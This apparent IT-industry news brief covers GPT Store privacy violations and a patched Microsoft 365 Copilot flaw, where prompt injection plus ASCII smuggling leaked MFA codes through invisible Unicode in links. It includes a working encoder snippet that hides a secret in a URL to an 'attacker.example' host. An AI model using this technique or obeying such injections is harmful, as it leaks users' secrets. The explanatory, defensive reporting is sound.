Press "Enter" to skip to content

Washington University Study Uncovers Data Privacy Risks in GPT Store

Let’s talk about some vulnerabilities, too.

A study by researchers at Washington University reveals that many GPT apps in OpenAI’s GPT Store violate its data collection policies, with only 5.8% of services clearly disclosing their practices. The analysis of nearly 120,000 GPTs found extensive data collection, including sensitive information such as passwords, often without adequate privacy documentation. The researchers highlight significant privacy and security issues, noting that third-party Actions embedded in GPTs can access and share user data across apps, raising the risk of data exposure. Although OpenAI has removed non-compliant GPTs, the study concludes that the company’s enforcement and privacy controls remain insufficient.
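To make the exposure pattern concrete, here is a hypothetical sketch of what the researchers describe: a GPT's third-party Action receives fields drawn from the user's conversation and forwards them to an external server the user never interacts with directly. The endpoint URL, field names, and payload below are illustrative assumptions, not details from the study.

```python
import json
import urllib.request

def call_action(user_fields: dict) -> None:
    """Forward conversation-derived data to a hypothetical third-party Action endpoint."""
    payload = json.dumps(user_fields).encode("utf-8")
    req = urllib.request.Request(
        "https://thirdparty-action.example/api/lookup",  # hypothetical Action server
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req)  # the data now sits outside OpenAI's privacy controls

# Anything the user typed into the chat, including sensitive details,
# can end up in the payload the Action sends onward.
call_action({"email": "user@example.com", "password_hint": "first pet's name"})
```

Once data crosses that boundary, its handling depends entirely on the third party's own (often undocumented) privacy practices, which is the gap the study highlights.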

Microsoft has patched a vulnerability in Microsoft 365 Copilot that allowed data theft through ASCII smuggling, a technique that hides data in invisible Unicode characters so it can ride inside seemingly innocuous clickable links. The attack combined prompt injection with this hidden channel and could exfiltrate sensitive information, including MFA codes, to adversary-controlled servers. Microsoft emphasized the need for enterprises to assess their risk and implement security controls to prevent data leaks from Copilot systems.
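For a sense of how ASCII smuggling works in general, here is a minimal sketch: printable ASCII is remapped into Unicode Tag characters (U+E0000 to U+E007F), which most interfaces render as invisible, so the hidden payload can be appended to an ordinary-looking URL and decoded on the receiving side. The secret value and attacker URL are hypothetical examples, not details from the Copilot research.

```python
def smuggle(text: str) -> str:
    """Map printable ASCII to invisible Unicode Tag characters."""
    return "".join(chr(0xE0000 + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)

def unsmuggle(text: str) -> str:
    """Recover the hidden ASCII from any Tag characters in the string."""
    return "".join(chr(ord(c) - 0xE0000) for c in text if 0xE0000 <= ord(c) <= 0xE007F)

secret = "MFA code: 123456"  # hypothetical sensitive value
link = f"https://attacker.example/collect#{smuggle(secret)}"

print(link)             # displays as a plain URL in most renderers
print(unsmuggle(link))  # attacker-side decode recovers "MFA code: 123456"
```

The point is that the exfiltrated text never appears on screen; it only becomes visible again when the attacker decodes the Tag characters.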

Why do we care?

The vulnerabilities exposed in AI platforms like GPT apps and Microsoft 365 Copilot highlight the growing security risks associated with AI adoption. For IT service providers, this is a call to focus on AI-specific security and privacy strategies: conducting AI risk assessments, enforcing stricter data governance, and running compliance checks. Businesses adopting AI need partners who understand these risks and can provide proactive solutions to mitigate potential vulnerabilities, ensuring AI innovation doesn’t come at the cost of privacy and security. And that partner should be you.